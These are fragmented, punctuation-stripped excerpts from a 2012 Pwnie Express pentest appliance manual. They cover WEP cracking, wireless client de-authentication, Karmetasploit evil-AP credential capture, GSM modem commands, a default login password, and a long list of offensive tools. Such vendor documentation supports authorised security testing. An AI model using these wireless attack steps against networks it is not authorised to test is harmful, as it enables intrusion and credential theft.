30. th SSID example is within range of the appliance ifconfig wlanO up iwconfig wlanO channel 6 ifconfig wlan0 down aireplay ng e example test wlan0 2 Look for the following output 17 19 45 Waiting for beacon frame ESSID example on channel 6 Found BSSID 00 13 10 9E 52 3D to given ESSID example 17 19 45 Trying broadcast probe requests 17 19 45 Injection is working 17 19 46 Found 1 AP 3 To auto crack all WEP enabled access points on channel 6 using wepbuster ifconfig wlan0 down wepbuster 6 Tip WEP cracking performance is very dependant on the amount of wireless client traffic being generated on the target wifi network The more traffic on the wireless network the faster the cracking process Wireless client de authentication 1 This example assumes the target access point is on channel 6 iwconfig wlanO channel 6 2 In one terminal start airodump ng airodump ng bssid MAC of target AP c 6 wlan0 3 Then in a second terminal start the client de authentication Copyright 2012 Pwnie Express 18 aireplay ng 0 0 a MAC of target AP c MAC of target client wland Karmetasploit Once an Evil AP is running Karmetasploit can be invoked as follows 1 CD to the Metasploit directory cd opt metasploit msf3 Confirm the following variables in karma rc setg AUTOPWN_HOST 192 168 7 1 set LHOST 192 168 7 1 use auxiliary server capture http set SRVPORT 9443 set SSL tru
31. uded micro SIM card adapter Slide the plastic cover back onto the adapter Connect the GSM adapter to the appliance s USB port Confirm the GSM adapter is detected properly note adapter detection may take 15 20 seconds lsusb Bus 001 Device 003 ID 12d1 1436 Huawei Technologies Co Ltd To query the GSM modem for adapter details Copyright 2012 Pwnie Express 21 gsmctl d dev ttyUSBO me Note If the command returns SIM failure the SIM card is either missing or not inserted properly Tip If the modem does not respond on dev ttyUSBO after 10 seconds try dev ttyUSB1 dev ttyUSB2 or dev ttyUSB3 To list cellular operators in range gsmctl d dev ttyUSBO op To show currently attached operator gsmctl d dev ttyUSBO currop To show signal strength of current operator connection gsmctl d dev ttyUSBO sig To check PIN status READY No PIN set gsmctl d dev ttyUSBO pin To send a text message gsmsendsms d dev ttyUSBO destination 11 digit cell number Test To make an outbound phone call gsmctl d dev ttyUSBO o dial 11 digit phone number Activating the Virgin Mobile Verizon adapters 1 The Virgin Mobile and Verizon CDMA adapters must be activated with a mobile broadband plan before they can connect the the Internet This one time activation must be completed on Windows Virgin Mobile mobile broadband plans http www virginmobileusa com mobile broadband
32. ur Linux Mac Windows system with the following IP settings IP address 192 168 9 11 Netmask 255 255 255 0 Tip On Linux hosts you can configure a virtual interface as shown ifconfig eth0 1 192 168 9 11 24 Confirm connectivity to the appliance by pinging it ping 192 168 9 10 You can now access the appliance through the Pwnix UI proceed to Accessing the Pwnix UI below Copyright 2012 Pwnie Express 4 Tip You can also now connect to the appliance via SSH as show below ssh pwnie 192 168 9 10 Using the Pwnix UI Accessing Pwnix UI Open a web browser and access the UI https appliance_ip_address 8443 Tip If accessing for the first time the default URL is https 192 168 9 10 8443 2 The UI is SSL enabled but you will receive a warning as the certificate is self signed 3 You are then prompted for login password default is pwnie pwnplug8000 4 The Setup page appears Important Please change the default Pwnix password as soon as possible Proceed to Change Pwnix Password below Setup tab Change Pwnix Password Click Setup on the top menu Click User Interface Enter a new password for the pwnie user into both fields and click Update password Note This will change the password for the pwnie UI user and the pwnie system Linux SSH account Pwnix UI authentication is integrated with Linux PAM allowing the UI and system passwords to be synced for the
33. weevely amp amp python weevely py python pentest wifitap wifitap py h python pentest wifite wifite py python pentest wifizoo wifizoo py Running tools installed via aptitude arp scan ettercap h dsniff h hping3 h john nbtscan nc h ftp h telnet h nikto Help openssl scapy h xprobe2 h iodine openvpn cryptcat h sipsak miredo h sslsniff tcptraceroute netdiscover udptunnel h dnstracer Copyright 2012 Pwnie Express 27 ssiscan ipcalc socat h onesixtyone tinyproxy h dmitry ssidump h fping h gpsd h darkstat arping sipcrack proxychains proxytunnel help wapiti skipfish h nmap hydra alive6 amap6 denial6 detect new ip6 dnsdict6 dos new ip6 exploit6 fake_advertise6 fake_dhcps6 fake_dnsupdate6 fake_mipv6 fake_mld26 fake_mld6 fake_mldrouter6 fake_router6 flood_advertise6 flood_dhcpc6 flood_mld26 flood_mld6 flood_mldrouter6 flood_router6 flood_solicitate6 fragmentation6 fuzz_ip6 implementation6 kill_router6 ndpexhaust6 parasite6 randicmp6 redir6 rsmurf6 sendpees6 Copyright 2012 Pwnie Express 28 sendpeesmp6 smurf6 thcping6 toobig6 trace6 Additional features Installing Tenable Nessus Server 1 Download the Ubuntu 12 04 64 bits Nessus deb
Download Pdf Manuals
Related Search